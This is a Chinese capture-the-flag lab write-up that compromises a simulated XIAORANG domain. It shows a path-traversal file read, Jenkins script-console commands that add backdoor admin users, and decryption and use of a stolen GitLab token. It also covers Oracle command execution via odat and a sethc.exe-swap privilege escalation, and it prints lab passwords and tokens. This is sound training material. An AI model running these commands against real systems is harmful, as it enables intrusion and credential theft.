Privilege-春秋云镜

信息收集

先看扫描记录

没啥东西就俩web，联想提示，咱们去扫描下目录。

有一个源码，下载下来审计一下。

任意文件读取

先去读一下flag，然后再去读一下另一个网站的密码。

http://39.98.114.207/tools/content-log.php?logfile=../../../../../../../../../Users/Administrator/flag/flag01.txt

http://39.98.114.207/tools/content-log.php?logfile=C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword

然后去登录下另一台网站的后台看看

jenkins后台RCE

jenkins有个地方可以执行命令

权限很高，那么添加个后门用户rdp上去看看

println "net user oceanz admin@123 /add".execute().text 
println "net localgroup administrators oceanz /add".execute().text

内网渗透

先扫描下内网，顺便搭建个代理方便后续的渗透。

  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.14.7     is alive
(icmp) Target 172.22.14.11    is alive
(icmp) Target 172.22.14.16    is alive
(icmp) Target 172.22.14.31    is alive
(icmp) Target 172.22.14.46    is alive
[*] Icmp alive hosts len is: 5
172.22.14.7:3306 open
172.22.14.7:8080 open
172.22.14.31:1521 open
172.22.14.11:445 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.7:445 open
172.22.14.31:139 open
172.22.14.46:139 open
172.22.14.11:139 open
172.22.14.31:135 open
172.22.14.46:135 open
172.22.14.7:139 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo
[*]172.22.14.7
   [->]XR-JENKINS
   [->]172.22.14.7
[*] WebTitle http://172.22.14.16       code:302 len:99     title:None 跳转url: http://172.22.14.16/users/sign_in
[*] NetBios 172.22.14.11    [+] DC:XIAORANG\XR-DC
[*] NetInfo
[*]172.22.14.11
   [->]XR-DC
   [->]172.22.14.11
[*] WebTitle http://172.22.14.7:8080   code:403 len:548    title:None
[*] WebTitle http://172.22.14.16:8060  code:404 len:555    title:404 Not Found
[*] NetInfo
[*]172.22.14.46
   [->]XR-0923
   [->]172.22.14.46
[*] NetBios 172.22.14.46    XIAORANG\XR-0923
[*] NetBios 172.22.14.31    WORKGROUP\XR-ORACLE
[*] NetInfo
[*]172.22.14.31
   [->]XR-ORACLE
   [->]172.22.14.31
[*] WebTitle http://172.22.14.7        code:200 len:54603  title:XR SHOP
[*] WebTitle http://172.22.14.46       code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961  title:Sign in · GitLab

看第二关的提示说有什么gitlab的apitoken 去翻翻配置文件看看

<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1214.v1de940103927">
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <com.cloudbees.plugins.credentials.domains.Domain>
        <specifications/>
      </com.cloudbees.plugins.credentials.domains.Domain>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.6.0">
          <scope>GLOBAL</scope>
          <id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
          <description></description>
          <apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
        </com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>

需要解密一下这个apitoken

println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())

然后利用api去列出gitlab中有哪些项目去翻翻oracle的密码

./proxychains4 -f proxychains.conf  curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"

记录

[![](https://tool.oschina.net/tools/json_format/Expanded.gif)
    {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
        "id": 6, 
        "description": null, 
        "name": "Internal Secret", 
        "name_with_namespace": "XRLAB / Internal Secret", 
        "path": "internal-secret", 
        "path_with_namespace": "xrlab/internal-secret", 
        "created_at": "2022-12-25T08:30:12.362Z", 
        "default_branch": "main", 
        "tag_list": [ ], 
        "topics": [ ], 
        "ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/internal-secret.git", 
        "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git", 
        "web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret", 
        "readme_url": null, 
        "avatar_url": null, 
        "forks_count": 0, 
        "star_count": 0, 
        "last_activity_at": "2022-12-25T08:30:12.362Z", 
        "namespace": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "id": 8, 
            "name": "XRLAB", 
            "path": "xrlab", 
            "kind": "group", 
            "full_path": "xrlab", 
            "parent_id": null, 
            "avatar_url": null, 
            "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
        }, 
        "_links": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "self": "http://gitlab.xiaorang.lab/api/v4/projects/6", 
            "issues": "http://gitlab.xiaorang.lab/api/v4/projects/6/issues", 
            "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests", 
            "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches", 
            "labels": "http://gitlab.xiaorang.lab/api/v4/projects/6/labels", 
            "events": "http://gitlab.xiaorang.lab/api/v4/projects/6/events", 
            "members": "http://gitlab.xiaorang.lab/api/v4/projects/6/members", 
            "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"
        }, 
        "packages_enabled": true, 
        "empty_repo": false, 
        "archived": false, 
        "visibility": "private", 
        "resolve_outdated_diff_discussions": false, 
        "container_expiration_policy": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "cadence": "1d", 
            "enabled": false, 
            "keep_n": 10, 
            "older_than": "90d", 
            "name_regex": ".*", 
            "name_regex_keep": null, 
            "next_run_at": "2022-12-26T08:30:12.373Z"
        }, 
        "issues_enabled": true, 
        "merge_requests_enabled": true, 
        "wiki_enabled": true, 
        "jobs_enabled": true, 
        "snippets_enabled": true, 
        "container_registry_enabled": true, 
        "service_desk_enabled": false, 
        "service_desk_address": null, 
        "can_create_merge_request_in": true, 
        "issues_access_level": "enabled", 
        "repository_access_level": "enabled", 
        "merge_requests_access_level": "enabled", 
        "forking_access_level": "enabled", 
        "wiki_access_level": "enabled", 
        "builds_access_level": "enabled", 
        "snippets_access_level": "enabled", 
        "pages_access_level": "private", 
        "operations_access_level": "enabled", 
        "analytics_access_level": "enabled", 
        "container_registry_access_level": "enabled", 
        "security_and_compliance_access_level": "private", 
        "releases_access_level": "enabled", 
        "environments_access_level": "enabled", 
        "feature_flags_access_level": "enabled", 
        "infrastructure_access_level": "enabled", 
        "monitor_access_level": "enabled", 
        "emails_disabled": null, 
        "shared_runners_enabled": true, 
        "lfs_enabled": true, 
        "creator_id": 2, 
        "import_url": null, 
        "import_type": null, 
        "import_status": "none", 
        "open_issues_count": 0, 
        "ci_default_git_depth": 20, 
        "ci_forward_deployment_enabled": true, 
        "ci_job_token_scope_enabled": false, 
        "ci_separated_caches": true, 
        "ci_opt_in_jwt": false, 
        "ci_allow_fork_pipelines_to_run_in_parent_project": true, 
        "public_jobs": true, 
        "build_timeout": 3600, 
        "auto_cancel_pending_pipelines": "enabled", 
        "ci_config_path": null, 
        "shared_with_groups": [ ], 
        "only_allow_merge_if_pipeline_succeeds": false, 
        "allow_merge_on_skipped_pipeline": null, 
        "restrict_user_defined_variables": false, 
        "request_access_enabled": true, 
        "only_allow_merge_if_all_discussions_are_resolved": false, 
        "remove_source_branch_after_merge": true, 
        "printing_merge_request_link_enabled": true, 
        "merge_method": "merge", 
        "squash_option": "default_off", 
        "enforce_auth_checks_on_uploads": true, 
        "suggestion_commit_message": null, 
        "merge_commit_template": null, 
        "squash_commit_template": null, 
        "issue_branch_template": null, 
        "auto_devops_enabled": true, 
        "auto_devops_deploy_strategy": "continuous", 
        "autoclose_referenced_issues": true, 
        "keep_latest_artifact": true, 
        "runner_token_expiration_interval": null, 
        "permissions": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "project_access": null, 
            "group_access": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
                "access_level": 50, 
                "notification_level": 3
            }
        }
    }, 
    {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
        "id": 4, 
        "description": null, 
        "name": "XRAdmin", 
        "name_with_namespace": "XRLAB / XRAdmin", 
        "path": "xradmin", 
        "path_with_namespace": "xrlab/xradmin", 
        "created_at": "2022-12-25T07:48:16.751Z", 
        "default_branch": "main", 
        "tag_list": [ ], 
        "topics": [ ], 
        "ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xradmin.git", 
        "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git", 
        "web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin", 
        "readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md", 
        "avatar_url": null, 
        "forks_count": 0, 
        "star_count": 0, 
        "last_activity_at": "2023-05-30T10:27:31.762Z", 
        "namespace": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "id": 8, 
            "name": "XRLAB", 
            "path": "xrlab", 
            "kind": "group", 
            "full_path": "xrlab", 
            "parent_id": null, 
            "avatar_url": null, 
            "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
        }, 
        "_links": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "self": "http://gitlab.xiaorang.lab/api/v4/projects/4", 
            "issues": "http://gitlab.xiaorang.lab/api/v4/projects/4/issues", 
            "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests", 
            "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches", 
            "labels": "http://gitlab.xiaorang.lab/api/v4/projects/4/labels", 
            "events": "http://gitlab.xiaorang.lab/api/v4/projects/4/events", 
            "members": "http://gitlab.xiaorang.lab/api/v4/projects/4/members", 
            "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"
        }, 
        "packages_enabled": true, 
        "empty_repo": false, 
        "archived": false, 
        "visibility": "private", 
        "resolve_outdated_diff_discussions": false, 
        "container_expiration_policy": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "cadence": "1d", 
            "enabled": false, 
            "keep_n": 10, 
            "older_than": "90d", 
            "name_regex": ".*", 
            "name_regex_keep": null, 
            "next_run_at": "2022-12-26T07:48:16.788Z"
        }, 
        "issues_enabled": true, 
        "merge_requests_enabled": true, 
        "wiki_enabled": true, 
        "jobs_enabled": true, 
        "snippets_enabled": true, 
        "container_registry_enabled": true, 
        "service_desk_enabled": false, 
        "service_desk_address": null, 
        "can_create_merge_request_in": true, 
        "issues_access_level": "enabled", 
        "repository_access_level": "enabled", 
        "merge_requests_access_level": "enabled", 
        "forking_access_level": "enabled", 
        "wiki_access_level": "enabled", 
        "builds_access_level": "enabled", 
        "snippets_access_level": "enabled", 
        "pages_access_level": "private", 
        "operations_access_level": "enabled", 
        "analytics_access_level": "enabled", 
        "container_registry_access_level": "enabled", 
        "security_and_compliance_access_level": "private", 
        "releases_access_level": "enabled", 
        "environments_access_level": "enabled", 
        "feature_flags_access_level": "enabled", 
        "infrastructure_access_level": "enabled", 
        "monitor_access_level": "enabled", 
        "emails_disabled": null, 
        "shared_runners_enabled": true, 
        "lfs_enabled": true, 
        "creator_id": 2, 
        "import_url": null, 
        "import_type": null, 
        "import_status": "none", 
        "open_issues_count": 0, 
        "ci_default_git_depth": 20, 
        "ci_forward_deployment_enabled": true, 
        "ci_job_token_scope_enabled": false, 
        "ci_separated_caches": true, 
        "ci_opt_in_jwt": false, 
        "ci_allow_fork_pipelines_to_run_in_parent_project": true, 
        "public_jobs": true, 
        "build_timeout": 3600, 
        "auto_cancel_pending_pipelines": "enabled", 
        "ci_config_path": null, 
        "shared_with_groups": [ ], 
        "only_allow_merge_if_pipeline_succeeds": false, 
        "allow_merge_on_skipped_pipeline": null, 
        "restrict_user_defined_variables": false, 
        "request_access_enabled": true, 
        "only_allow_merge_if_all_discussions_are_resolved": false, 
        "remove_source_branch_after_merge": true, 
        "printing_merge_request_link_enabled": true, 
        "merge_method": "merge", 
        "squash_option": "default_off", 
        "enforce_auth_checks_on_uploads": true, 
        "suggestion_commit_message": null, 
        "merge_commit_template": null, 
        "squash_commit_template": null, 
        "issue_branch_template": null, 
        "auto_devops_enabled": false, 
        "auto_devops_deploy_strategy": "continuous", 
        "autoclose_referenced_issues": true, 
        "keep_latest_artifact": true, 
        "runner_token_expiration_interval": null, 
        "permissions": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "project_access": null, 
            "group_access": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
                "access_level": 50, 
                "notification_level": 3
            }
        }
    }, 
    {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
        "id": 3, 
        "description": null, 
        "name": "Awenode", 
        "name_with_namespace": "XRLAB / Awenode", 
        "path": "awenode", 
        "path_with_namespace": "xrlab/awenode", 
        "created_at": "2022-12-25T07:46:43.635Z", 
        "default_branch": "master", 
        "tag_list": [ ], 
        "topics": [ ], 
        "ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/awenode.git", 
        "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git", 
        "web_url": "http://gitlab.xiaorang.lab/xrlab/awenode", 
        "readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md", 
        "avatar_url": null, 
        "forks_count": 0, 
        "star_count": 0, 
        "last_activity_at": "2022-12-25T07:46:43.635Z", 
        "namespace": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "id": 8, 
            "name": "XRLAB", 
            "path": "xrlab", 
            "kind": "group", 
            "full_path": "xrlab", 
            "parent_id": null, 
            "avatar_url": null, 
            "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
        }, 
        "_links": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "self": "http://gitlab.xiaorang.lab/api/v4/projects/3", 
            "issues": "http://gitlab.xiaorang.lab/api/v4/projects/3/issues", 
            "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests", 
            "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches", 
            "labels": "http://gitlab.xiaorang.lab/api/v4/projects/3/labels", 
            "events": "http://gitlab.xiaorang.lab/api/v4/projects/3/events", 
            "members": "http://gitlab.xiaorang.lab/api/v4/projects/3/members", 
            "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"
        }, 
        "packages_enabled": true, 
        "empty_repo": false, 
        "archived": false, 
        "visibility": "private", 
        "resolve_outdated_diff_discussions": false, 
        "container_expiration_policy": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "cadence": "1d", 
            "enabled": false, 
            "keep_n": 10, 
            "older_than": "90d", 
            "name_regex": ".*", 
            "name_regex_keep": null, 
            "next_run_at": "2022-12-26T07:46:44.614Z"
        }, 
        "issues_enabled": true, 
        "merge_requests_enabled": true, 
        "wiki_enabled": true, 
        "jobs_enabled": true, 
        "snippets_enabled": true, 
        "container_registry_enabled": true, 
        "service_desk_enabled": false, 
        "service_desk_address": null, 
        "can_create_merge_request_in": true, 
        "issues_access_level": "enabled", 
        "repository_access_level": "enabled", 
        "merge_requests_access_level": "enabled", 
        "forking_access_level": "enabled", 
        "wiki_access_level": "enabled", 
        "builds_access_level": "enabled", 
        "snippets_access_level": "enabled", 
        "pages_access_level": "private", 
        "operations_access_level": "enabled", 
        "analytics_access_level": "enabled", 
        "container_registry_access_level": "enabled", 
        "security_and_compliance_access_level": "private", 
        "releases_access_level": "enabled", 
        "environments_access_level": "enabled", 
        "feature_flags_access_level": "enabled", 
        "infrastructure_access_level": "enabled", 
        "monitor_access_level": "enabled", 
        "emails_disabled": null, 
        "shared_runners_enabled": true, 
        "lfs_enabled": true, 
        "creator_id": 2, 
        "import_url": null, 
        "import_type": "gitlab_project", 
        "import_status": "finished", 
        "open_issues_count": 0, 
        "ci_default_git_depth": 20, 
        "ci_forward_deployment_enabled": true, 
        "ci_job_token_scope_enabled": false, 
        "ci_separated_caches": true, 
        "ci_opt_in_jwt": false, 
        "ci_allow_fork_pipelines_to_run_in_parent_project": true, 
        "public_jobs": true, 
        "build_timeout": 3600, 
        "auto_cancel_pending_pipelines": "enabled", 
        "ci_config_path": null, 
        "shared_with_groups": [ ], 
        "only_allow_merge_if_pipeline_succeeds": false, 
        "allow_merge_on_skipped_pipeline": null, 
        "restrict_user_defined_variables": false, 
        "request_access_enabled": true, 
        "only_allow_merge_if_all_discussions_are_resolved": false, 
        "remove_source_branch_after_merge": true, 
        "printing_merge_request_link_enabled": true, 
        "merge_method": "merge", 
        "squash_option": "default_off", 
        "enforce_auth_checks_on_uploads": true, 
        "suggestion_commit_message": null, 
        "merge_commit_template": null, 
        "squash_commit_template": null, 
        "issue_branch_template": null, 
        "auto_devops_enabled": true, 
        "auto_devops_deploy_strategy": "continuous", 
        "autoclose_referenced_issues": true, 
        "keep_latest_artifact": true, 
        "runner_token_expiration_interval": null, 
        "permissions": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "project_access": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
                "access_level": 40, 
                "notification_level": null
            }, 
            "group_access": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
                "access_level": 50, 
                "notification_level": 3
            }
        }
    }, 
    {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
        "id": 2, 
        "description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook", 
        "name": "XRWiki", 
        "name_with_namespace": "XRLAB / XRWiki", 
        "path": "xrwiki", 
        "path_with_namespace": "xrlab/xrwiki", 
        "created_at": "2022-12-25T07:44:18.589Z", 
        "default_branch": "master", 
        "tag_list": [ ], 
        "topics": [ ], 
        "ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xrwiki.git", 
        "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git", 
        "web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki", 
        "readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md", 
        "avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png", 
        "forks_count": 0, 
        "star_count": 0, 
        "last_activity_at": "2022-12-25T07:44:18.589Z", 
        "namespace": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "id": 8, 
            "name": "XRLAB", 
            "path": "xrlab", 
            "kind": "group", 
            "full_path": "xrlab", 
            "parent_id": null, 
            "avatar_url": null, 
            "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
        }, 
        "_links": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "self": "http://gitlab.xiaorang.lab/api/v4/projects/2", 
            "issues": "http://gitlab.xiaorang.lab/api/v4/projects/2/issues", 
            "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests", 
            "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches", 
            "labels": "http://gitlab.xiaorang.lab/api/v4/projects/2/labels", 
            "events": "http://gitlab.xiaorang.lab/api/v4/projects/2/events", 
            "members": "http://gitlab.xiaorang.lab/api/v4/projects/2/members", 
            "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"
        }, 
        "packages_enabled": true, 
        "empty_repo": false, 
        "archived": false, 
        "visibility": "private", 
        "resolve_outdated_diff_discussions": null, 
        "container_expiration_policy": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "cadence": "1d", 
            "enabled": false, 
            "keep_n": 10, 
            "older_than": "90d", 
            "name_regex": ".*", 
            "name_regex_keep": null, 
            "next_run_at": "2022-12-26T07:44:18.627Z"
        }, 
        "issues_enabled": true, 
        "merge_requests_enabled": true, 
        "wiki_enabled": false, 
        "jobs_enabled": true, 
        "snippets_enabled": false, 
        "container_registry_enabled": false, 
        "service_desk_enabled": false, 
        "service_desk_address": null, 
        "can_create_merge_request_in": true, 
        "issues_access_level": "enabled", 
        "repository_access_level": "enabled", 
        "merge_requests_access_level": "enabled", 
        "forking_access_level": "enabled", 
        "wiki_access_level": "disabled", 
        "builds_access_level": "enabled", 
        "snippets_access_level": "disabled", 
        "pages_access_level": "public", 
        "operations_access_level": "enabled", 
        "analytics_access_level": "enabled", 
        "container_registry_access_level": "disabled", 
        "security_and_compliance_access_level": "private", 
        "releases_access_level": "enabled", 
        "environments_access_level": "enabled", 
        "feature_flags_access_level": "enabled", 
        "infrastructure_access_level": "enabled", 
        "monitor_access_level": "enabled", 
        "emails_disabled": null, 
        "shared_runners_enabled": true, 
        "lfs_enabled": true, 
        "creator_id": 2, 
        "import_url": null, 
        "import_type": "gitlab_project", 
        "import_status": "finished", 
        "open_issues_count": 0, 
        "ci_default_git_depth": 20, 
        "ci_forward_deployment_enabled": true, 
        "ci_job_token_scope_enabled": false, 
        "ci_separated_caches": true, 
        "ci_opt_in_jwt": false, 
        "ci_allow_fork_pipelines_to_run_in_parent_project": true, 
        "public_jobs": true, 
        "build_timeout": 3600, 
        "auto_cancel_pending_pipelines": "enabled", 
        "ci_config_path": null, 
        "shared_with_groups": [ ], 
        "only_allow_merge_if_pipeline_succeeds": false, 
        "allow_merge_on_skipped_pipeline": null, 
        "restrict_user_defined_variables": false, 
        "request_access_enabled": false, 
        "only_allow_merge_if_all_discussions_are_resolved": false, 
        "remove_source_branch_after_merge": true, 
        "printing_merge_request_link_enabled": true, 
        "merge_method": "merge", 
        "squash_option": "default_off", 
        "enforce_auth_checks_on_uploads": true, 
        "suggestion_commit_message": null, 
        "merge_commit_template": null, 
        "squash_commit_template": null, 
        "issue_branch_template": null, 
        "auto_devops_enabled": true, 
        "auto_devops_deploy_strategy": "continuous", 
        "autoclose_referenced_issues": true, 
        "keep_latest_artifact": true, 
        "runner_token_expiration_interval": null, 
        "permissions": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "project_access": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
                "access_level": 40, 
                "notification_level": null
            }, 
            "group_access": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
                "access_level": 50, 
                "notification_level": 3
            }
        }
    }, 
    {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
        "id": 1, 
        "description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).", 
        "name": "Monitoring", 
        "name_with_namespace": "GitLab Instance / Monitoring", 
        "path": "Monitoring", 
        "path_with_namespace": "gitlab-instance-23352f48/Monitoring", 
        "created_at": "2022-12-25T07:18:20.914Z", 
        "default_branch": "main", 
        "tag_list": [ ], 
        "topics": [ ], 
        "ssh_url_to_repo": "git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git", 
        "http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git", 
        "web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring", 
        "readme_url": null, 
        "avatar_url": null, 
        "forks_count": 0, 
        "star_count": 0, 
        "last_activity_at": "2022-12-25T07:18:20.914Z", 
        "namespace": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "id": 2, 
            "name": "GitLab Instance", 
            "path": "gitlab-instance-23352f48", 
            "kind": "group", 
            "full_path": "gitlab-instance-23352f48", 
            "parent_id": null, 
            "avatar_url": null, 
            "web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
        }, 
        "_links": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "self": "http://gitlab.xiaorang.lab/api/v4/projects/1", 
            "issues": "http://gitlab.xiaorang.lab/api/v4/projects/1/issues", 
            "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests", 
            "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches", 
            "labels": "http://gitlab.xiaorang.lab/api/v4/projects/1/labels", 
            "events": "http://gitlab.xiaorang.lab/api/v4/projects/1/events", 
            "members": "http://gitlab.xiaorang.lab/api/v4/projects/1/members", 
            "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"
        }, 
        "packages_enabled": true, 
        "empty_repo": true, 
        "archived": false, 
        "visibility": "internal", 
        "resolve_outdated_diff_discussions": false, 
        "container_expiration_policy": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "cadence": "1d", 
            "enabled": false, 
            "keep_n": 10, 
            "older_than": "90d", 
            "name_regex": ".*", 
            "name_regex_keep": null, 
            "next_run_at": "2022-12-26T07:18:21.108Z"
        }, 
        "issues_enabled": true, 
        "merge_requests_enabled": true, 
        "wiki_enabled": true, 
        "jobs_enabled": true, 
        "snippets_enabled": true, 
        "container_registry_enabled": true, 
        "service_desk_enabled": false, 
        "can_create_merge_request_in": true, 
        "issues_access_level": "enabled", 
        "repository_access_level": "enabled", 
        "merge_requests_access_level": "enabled", 
        "forking_access_level": "enabled", 
        "wiki_access_level": "enabled", 
        "builds_access_level": "enabled", 
        "snippets_access_level": "enabled", 
        "pages_access_level": "private", 
        "operations_access_level": "enabled", 
        "analytics_access_level": "enabled", 
        "container_registry_access_level": "enabled", 
        "security_and_compliance_access_level": "private", 
        "releases_access_level": "enabled", 
        "environments_access_level": "enabled", 
        "feature_flags_access_level": "enabled", 
        "infrastructure_access_level": "enabled", 
        "monitor_access_level": "enabled", 
        "emails_disabled": null, 
        "shared_runners_enabled": true, 
        "lfs_enabled": true, 
        "creator_id": 1, 
        "import_status": "none", 
        "open_issues_count": 0, 
        "ci_default_git_depth": 20, 
        "ci_forward_deployment_enabled": true, 
        "ci_job_token_scope_enabled": false, 
        "ci_separated_caches": true, 
        "ci_opt_in_jwt": false, 
        "ci_allow_fork_pipelines_to_run_in_parent_project": true, 
        "public_jobs": true, 
        "build_timeout": 3600, 
        "auto_cancel_pending_pipelines": "enabled", 
        "ci_config_path": null, 
        "shared_with_groups": [ ], 
        "only_allow_merge_if_pipeline_succeeds": false, 
        "allow_merge_on_skipped_pipeline": null, 
        "restrict_user_defined_variables": false, 
        "request_access_enabled": true, 
        "only_allow_merge_if_all_discussions_are_resolved": false, 
        "remove_source_branch_after_merge": true, 
        "printing_merge_request_link_enabled": true, 
        "merge_method": "merge", 
        "squash_option": "default_off", 
        "enforce_auth_checks_on_uploads": true, 
        "suggestion_commit_message": null, 
        "merge_commit_template": null, 
        "squash_commit_template": null, 
        "issue_branch_template": null, 
        "auto_devops_enabled": true, 
        "auto_devops_deploy_strategy": "continuous", 
        "autoclose_referenced_issues": true, 
        "keep_latest_artifact": true, 
        "runner_token_expiration_interval": null, 
        "permissions": {![](https://tool.oschina.net/tools/json_format/Expanded.gif)
            "project_access": null, 
            "group_access": null
        }
    }
]

把这几个项目脱下来看看

proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git

有一堆用户名和密码

在xradmin仓库中找到了密码

url: 172.22.14.31:1521/orcl  
username: xradmin  
password: fcMyE8t9E4XdsKf

找到一个工具odat针对oracle进行利用的，使用它来执行命令

proxychains4 ./odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user ocean admin@123 /add'
proxychains4 ./odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators ocean /add'

但是Arm架构的kali没有这个工具，先看其他的吧。

去下了一个在云服务器上打成功了。

上面的用户和密码看到有一列机器那一列和fscan扫描出来的记录有点像

XR-0923 | zhangshuai | wSbEajHzZs

先rdp过去看看。

可以看到这个用户是能够远程登录的。

SeRestorePrivilege提权

proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs

这怎么 winrm上来的权限还多一个，SeRestorePrivilege可以提权。

SeRestorePrivilege授予对系统上所有对象的写访问权，而不管它们的ACL如何。
滥用特权的三种方式：

• 修改服务二进制文件
• 覆盖系统进程使用的DLL
• 修改注册表设置
  也就是类似放大镜那种提权把cmd换成粘滞键然后锁屏按五次shift键
  参考：
  https://forum.butian.net/share/348
  https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E4%B9%9D%E7%A7%8D%E6%9D%83%E9%99%90%E7%9A%84%E5%88%A9%E7%94%A8

ren sethc.exe sethc.bak 
ren cmd.exe sethc.exe

可以看到提权成功。那么去抓一下hash

为了方便操作先添加个后门用户,抓到机器用户的hash

